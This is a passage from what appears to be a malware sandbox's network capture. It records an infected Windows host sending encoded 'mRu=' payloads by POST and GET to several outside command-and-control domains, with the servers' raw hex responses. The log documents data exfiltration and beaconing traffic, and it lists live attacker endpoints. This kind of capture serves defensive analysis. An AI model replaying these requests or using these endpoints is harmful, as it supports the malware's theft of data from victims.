34 68 54 2f 61 46 4d 66 33 52 53 50 68 55 64 58 71 4d 6e 61 2b 7a 49 77 36 65 30 68 55 48 77 43 78 50 38 45 47 42 72 67 35 50 54 50 65 37 52 76 76 34 68 61 77 4b 35 72 46 70 71 4e 57 44 52 49 4d 4c 35 6a 46 2f 35 67 74 43 54 36 7a 5a 34 36 62 54 48 53 4e 69 4c 32 6b 41 61 78 76 4f 68 42 37 63 57 2b 6f 4c 4e 58 2b 6b 6a 4a 30 78 42 42 70 67 36 6b 41 34 41 61 4a 7a 34 59 6e 32 46 39 36 2f 71 75 76 74 66 4d 63 6d 61 59 76 44 62 4a 61 4f 37 4b 6a 63 6a 2f 4f 30 72 2b 37 2f 75 36 43 5a 34 55 52 33 36 66 46 54 32 69 5a 41 31 76 32 43 4d 39 70 30 64 53 4d 6f [TRUNCATED] Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjiNL68ksM2YObXInUKAntPRuPG9G/hlc0afpc1GH9IWDjKvq8FfNG9VWGifiBMoDGOQbapcg8Ih7xzN7kZvYYIL77i248a1HWIM/rhbECIS4hT/aFMf3RSPhUdXqMna+zIw6e0hUHwCxP8EGBrg5PTPe7Rvv4hawK5rFpqNWDRIML5jF/5gtCT6zZ46bTHSNiL2kAaxvOhB7cW+oLNX+kjJ0xBBpg6kA4AaJz4Yn2F96/quvtfMcmaYvDbJaO7Kjcj/O0r+7/u6CZ4UR36fFT2iZA1v2CM9p0dSMo3Td2dRorgOsidURgvc3Qrhl7C0EYMJS5u1iAiwtsV4QbYcp2g+0g3fvSIBFWPkcGpuERIRUCT6+UhvctNHpCNUPTW4mDPAre+/aWP+BBTq2NcC2Ky4HW8XpGcZn8CPyZUL1deHk+wHsUtUGxVXEhQl4f7brxRP2l9OsGKQ1Foypm68boFymbuAXYRUbA/3vEdVKgulJCXCCV2fcunNNkKi12Amxgy1yc2ehLj22oIilpCStcJogY4HwMcQ2DQtNxpMlTOLfI+0q3ath1w+iRlEG2433/z+TVtqXL97uV0qUbnAOiIXSJBWhXdH3h1fHpQohXBMEivLa3erFbliubcu4m27B9YmW3xW1IuAAFDcc4DOBlAySU4uTXereOGGfCoPsXXhPwthl9r
Nov 12, 2024 15:33:47.860907078 CET	6633	OUT	Data Raw: 51 48 71 77 57 51 32 44 6e 4f 62 57 2f 38 66 55 52 6a 37 55 2f 39 5a 42 72 52 6e 77 49 6b 56 6e 4d 50 46 54 6e 71 4a 73 77 63 72 65 57 6e 57 6c 74 70 4c 59 58 2f 36 61 55 58 37 69 2f 39 4c 56 55 39 4f 65 34 50 68 38 76 70 7a 72 45 45 49 43 4d 55 Data Ascii: QHqwWQ2DnObW/8fURj7U/9ZBrRnwIkVnMPFTnqJswcreWnWltpLYX/6aUX7i/9LVU9Oe4Ph8vpzrEEICMUPjje0KYInHLGXGbKmdyFnqlk1qR5a0JzRTWO7zISkN5jf6r3Xa49aJgKntk3cag1Wt76cE/6XYtv7kxbrU7ihOHmNj+c92ll0Eqak2KZ8z+zOf0OjDipqxisB+80l91OoGsuqFKlSb7nfpCxyDceMVwffSTYEdEhs
Nov 12, 2024 15:33:48.181852102 CET	389	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:33:48 GMT Server: Apache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 178 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.11.20	49784	47.52.221.8	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:50.720370054 CET	477	OUT	GET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1 Host: www.wukong.college Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:33:51.050966024 CET	390	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:33:50 GMT Server: Apache Vary: Accept-Encoding Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 34 77 63 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /4wc1/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.11.20	49785	154.38.64.6	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:56.390572071 CET	741	OUT	POST /6yjb/ HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.qiusuo.vip Referer: http://www.qiusuo.vip/6yjb/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 32 59 64 57 52 49 74 6a 69 38 78 78 31 6f 42 44 68 43 50 52 48 42 37 4c 47 49 34 65 6d 38 53 69 4a 4d 49 54 66 69 37 6a 55 33 42 5a 79 71 72 35 70 4c 77 33 52 64 58 41 70 6d 6e 30 32 4a 57 4e 34 65 4f 47 52 67 53 70 45 36 41 7a 79 31 62 4f 30 6a 54 4a 4a 57 73 49 45 72 35 78 73 6f 30 39 64 2f 30 61 51 54 73 69 4a 59 36 6c 5a 4d 6d 73 39 61 54 32 72 66 58 66 55 6b 53 78 46 4a 4c 4c 41 38 74 6c 63 2f 73 63 37 36 50 35 30 56 35 72 2b 73 32 46 64 4f 6d 67 78 64 71 6e 33 79 61 72 64 77 43 7a 34 55 57 68 39 78 78 36 53 42 61 6f 61 73 32 6f 44 67 3d 3d Data Ascii: mRu=YalTSGWPO59z2YdWRItji8xx1oBDhCPRHB7LGI4em8SiJMITfi7jU3BZyqr5pLw3RdXApmn02JWN4eOGRgSpE6Azy1bO0jTJJWsIEr5xso09d/0aQTsiJY6lZMms9aT2rfXfUkSxFJLLA8tlc/sc76P50V5r+s2FdOmgxdqn3yardwCz4UWh9xx6SBaoas2oDg==
Nov 12, 2024 15:33:56.719913006 CET	535	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:33:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 337 Connection: close Content-Encoding: gzip Vary: Accept-Encoding Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.11.20	49786	154.38.64.6	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:59.243787050 CET	761	OUT	POST /6yjb/ HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.qiusuo.vip Referer: http://www.qiusuo.vip/6yjb/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4b 69 69 4a 73 59 54 63 6a 37 6a 54 33 42 5a 35 4b 72 38 71 37 78 37 52 61 65 31 70 6e 62 30 32 49 79 4e 34 66 2b 47 52 58 4f 71 47 71 41 31 36 56 62 4d 33 54 54 4a 4a 57 73 49 45 72 73 73 73 73 51 39 64 4e 67 61 53 79 73 6a 58 49 36 6b 61 4d 6d 73 35 61 54 79 72 66 58 74 55 6c 4f 62 46 50 48 4c 41 39 64 6c 64 72 34 64 31 4b 50 37 36 31 34 75 79 4a 71 42 61 76 47 79 31 74 79 58 37 79 57 4e 56 47 50 70 6c 6d 69 46 2b 69 74 49 57 78 6a 41 59 75 33 7a 65 68 39 45 45 33 42 70 6f 36 48 75 63 6e 4b 76 39 38 38 50 68 73 4d 3d Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmKiiJsYTcj7jT3BZ5Kr8q7x7Rae1pnb02IyN4f+GRXOqGqA16VbM3TTJJWsIErssssQ9dNgaSysjXI6kaMms5aTyrfXtUlObFPHLA9dldr4d1KP7614uyJqBavGy1tyX7yWNVGPplmiF+itIWxjAYu3zeh9EE3Bpo6HucnKv988PhsM=
Nov 12, 2024 15:33:59.563903093 CET	535	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:33:59 GMT Content-Type: text/html; charset=utf-8 Content-Length: 337 Connection: close Content-Encoding: gzip Vary: Accept-Encoding Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.11.20	49787	154.38.64.6	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:02.109790087 CET	6445	OUT	POST /6yjb/ HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.qiusuo.vip Referer: http://www.qiusuo.vip/6yjb/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 59 61 6c 54 53 47 57 50 4f 35 39 7a 33 37 31 57 51 75 6c 6a 75 4d 78 79 70 34 42 44 33 79 50 4b 48 42 2f 4c 47 4e 64 54 6d 4a 43 69 4a 61 55 54 65 41 54 6a 53 33 42 5a 77 71 72 39 71 37 77 68 52 63 32 35 70 6e 57 42 32 4b 36 4e 71 4a 4b 47 41 31 6d 71 4d 71 41 31 32 31 62 4a 30 6a 54 59 4a 57 38 55 45 72 38 73 73 73 51 39 64 4d 51 61 56 6a 73 6a 56 49 36 6c 5a 4d 6e 74 39 61 54 4b 72 66 66 39 55 6c 4b 68 46 66 6e 4c 4f 39 4e 6c 62 65 73 64 7a 61 50 39 33 56 34 49 79 4a 76 66 61 76 61 55 31 74 33 34 37 7a 4f 4e 52 51 4c 2f 69 47 79 73 73 6a 5a 78 5a 44 62 47 61 63 72 2b 62 69 70 69 46 47 39 6f 67 73 66 6d 41 30 6d 50 75 2b 38 37 67 35 42 6f 78 53 6f 53 63 4c 38 72 48 45 75 63 5a 59 5a 62 38 74 4f 45 62 32 34 46 42 58 4f 4a 6a 39 53 36 72 58 45 59 62 4e 6e 66 37 38 34 33 6c 6f 79 61 7a 52 62 72 31 6c 68 32 77 6b 32 37 44 44 62 6c 51 39 39 2b 5a 66 54 49 48 70 37 70 72 47 7a 31 6b 6b 54 70 69 6c 6a 41 5a 52 6b 79 44 37 6b 63 67 46 51 57 79 64 73 48 48 59 59 72 32 42 33 65 43 6a 52 2b 4e 69 [TRUNCATED] Data Ascii: mRu=YalTSGWPO59z371WQuljuMxyp4BD3yPKHB/LGNdTmJCiJaUTeATjS3BZwqr9q7whRc25pnWB2K6NqJKGA1mqMqA121bJ0jTYJW8UEr8sssQ9dMQaVjsjVI6lZMnt9aTKrff9UlKhFfnLO9NlbesdzaP93V4IyJvfavaU1t347zONRQL/iGyssjZxZDbGacr+bipiFG9ogsfmA0mPu+87g5BoxSoScL8rHEucZYZb8tOEb24FBXOJj9S6rXEYbNnf7843loyazRbr1lh2wk27DDblQ99+ZfTIHp7prGz1kkTpiljAZRkyD7kcgFQWydsHHYYr2B3eCjR+Ni83FdbmV4mYy+pBNxpNuPg7x+4IA7rKyZH+4muRaJgjBsJI4Iv+fHIrYx6wCutM//4bZXsos78r0N45Ihb0Sqt96mJBOqysK91ZiSoe8QGsVRM4BqgoUaRp5u27ogxgsUMbxf3NpbE6jQduZ+8UmMYG24iCC+hOpQ5yyX+mo3KGZprC8Ah468ELUryB1Jks4diQrtWBCaGL+pzVSzpOql1DVChXDhWsEX3RALyEFZFT+tzB0aH0n/ImLDSGGcMF2piu0LxV58M58xeaZxxCbKi1bPWmLRA6qLE21CySuhh5QPU49Gy9aZgtglGjY1r8+ozmzQFHgquV+wEPmh+HVhgOXWdBsrMx7/G/yxnwX1U+rZ6UpFtk7RV1x+4fLYj/0DvpXyq0v2fyXKcSQAl3jo361WfpV3s8FECryjUt8Ww2q+gR+KvqQooS71KFExVB9VY8vHoTf+XrjkUUP0uI9CbabRjqTF6100YnA7MnwAPQwwYGPNJ+7dKyXik5f5UYu+WMN9u86KzfO51gIjOpa9mEHDw553cQN1bnSH/YCLneVLQVxmLyY2Szps4bQelxUaMxg38QwhRuWXnDztSKCMhh8hvR2lO8mnWil+dF1QsAQvfCGSrbtvIHFkX9Pcyba7rQ9XvXMgFqZvaR9gcB2fOjODyFMtZZYAUm [TRUNCATED]
Nov 12, 2024 15:34:02.109862089 CET	1465	OUT	Data Raw: 31 57 56 6d 35 78 36 72 44 71 5a 33 38 2b 39 42 65 6b 6f 2b 76 30 57 2f 73 55 6d 50 55 61 4d 58 6a 4d 37 42 4e 51 7a 4d 6b 6a 71 51 45 42 64 61 4f 39 50 34 65 6f 36 4b 6e 6f 79 74 50 33 47 69 75 4d 7a 42 6b 73 49 4b 30 4b 58 46 38 32 71 31 63 49 Data Ascii: 1WVm5x6rDqZ38+9Beko+v0W/sUmPUaMXjM7BNQzMkjqQEBdaO9P4eo6KnoytP3GiuMzBksIK0KXF82q1cIl5B4NOZvKJDH/pvk8BMAzDNWLzdyGS9jLXjHGv6TzExarA1nXuyQNgQvrVOaQXrocxZqsxU6FGjgighBkqHkxXkasAyLgLSCRAbCrZESrY0eCZbS8gfa86k01TiulHQ3QRW5b0yiO6H6SCWZniiLAFaBC99AtsHX+
Nov 12, 2024 15:34:02.441257954 CET	535	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:34:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 337 Connection: close Content-Encoding: gzip Vary: Accept-Encoding Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.11.20	49788	154.38.64.6	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:04.962903976 CET	473	OUT	GET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1 Host: www.qiusuo.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:34:05.288237095 CET	820	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2024 14:34:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 654 Connection: close X-Cache: MISS Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 71 75 64 61 6f 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 6c 68 2e 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 6f 30 30 6f 30 6f 30 6f 30 6f 30 2e 63 6f 6d 2f 70 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <script src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/jquery.js"></script> <script charset="UTF-8" id="LA_COLLECT" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/qudao1.js"></script> ...script type="text/javascript" src="//lh.0o0o0o0o0o0o0o00o0o0o0o0.com/pd.js"></script--> <meta charset="UTF-8"> <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"> <title>website</title> <style> html,body,iframe{width: 100%;height: 100%;padding: 0;margin: 0} #wrap{width: 100%;height: 100%;} iframe{border: none;} </style></head>

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.11.20	49789	84.32.84.32	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:10.555835009 CET	741	OUT	POST /h7d8/ HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.pg874.shop Referer: http://www.pg874.shop/h7d8/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 69 34 6f 57 61 2b 77 35 6c 43 61 2b 63 36 31 70 74 56 55 70 50 77 76 6b 49 65 39 6c 61 41 6e 6e 56 73 4e 6e 44 6e 6e 4c 74 7a 6a 66 6b 6f 78 78 55 46 52 54 42 32 36 47 67 4a 76 51 72 52 2b 66 70 2b 39 31 33 4c 39 39 6d 35 2f 4a 2f 55 70 6f 43 67 30 73 6a 58 4f 54 58 41 63 61 48 35 59 31 73 56 75 61 74 47 74 70 34 6a 58 39 78 5a 66 56 4d 63 35 66 43 68 50 34 62 32 75 66 30 34 58 74 49 44 30 54 69 53 61 6c 45 31 76 4d 4b 53 42 63 37 30 56 35 63 57 4b 41 79 41 41 51 4c 36 38 7a 4b 4f 6e 41 45 34 2b 59 74 68 6b 78 66 70 74 78 4b 30 5a 2f 77 3d 3d Data Ascii: mRu=389inJRufg4iYi4oWa+w5lCa+c61ptVUpPwvkIe9laAnnVsNnDnnLtzjfkoxxUFRTB26GgJvQrR+fp+913L99m5/J/UpoCg0sjXOTXAcaH5Y1sVuatGtp4jX9xZfVMc5fChP4b2uf04XtID0TiSalE1vMKSBc70V5cWKAyAAQL68zKOnAE4+YthkxfptxK0Z/w==

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.11.20	49790	84.32.84.32	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:13.335037947 CET	761	OUT	POST /h7d8/ HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.pg874.shop Referer: http://www.pg874.shop/h7d8/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 6b 6e 6d 31 38 4e 6d 42 50 6e 49 74 7a 6a 51 30 6f 30 73 6b 45 64 54 42 71 59 47 6c 78 76 51 6f 74 2b 66 6f 4f 39 30 41 6e 69 38 32 35 39 63 76 55 76 32 79 67 30 73 6a 58 4f 54 55 38 6d 61 44 56 59 31 2f 39 75 5a 4d 47 75 67 59 6a 59 36 78 5a 66 45 63 63 39 66 43 68 68 34 65 75 41 66 32 41 58 74 4e 48 30 54 7a 53 5a 76 45 31 31 49 4b 54 6f 64 4b 5a 66 67 34 71 45 4e 52 6f 54 57 2b 71 6f 32 63 44 39 64 32 4d 61 62 2b 39 57 31 76 51 46 7a 49 31 43 69 7a 54 36 36 49 49 78 49 49 67 53 2f 66 63 65 73 57 6d 66 69 79 34 3d Data Ascii: 